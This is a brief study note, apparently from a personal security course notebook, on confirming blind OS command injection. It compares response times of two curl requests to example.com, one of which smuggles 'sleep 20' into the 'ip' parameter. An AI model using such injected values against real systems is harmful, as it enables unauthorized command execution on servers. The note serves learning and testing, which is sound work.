Blind command execution

Let's consider a case when an application doesn't return result of command execution. How can we check availability to execute command: We can use command sleep and compare response time of normal request and request with sleep payload. Normal request:

time curl "http://example.com?ip=127.0.0.1"

With sleep payload request

time curl "http://example.com?ip=127.0.0.1;sleep%2020"

See details here 2023090517563535 CMD Injection. Blind command execution#^0a1675

References

1. web200.Command Injection.Blind OS Command Injection Bypass, p.366 ^0a1675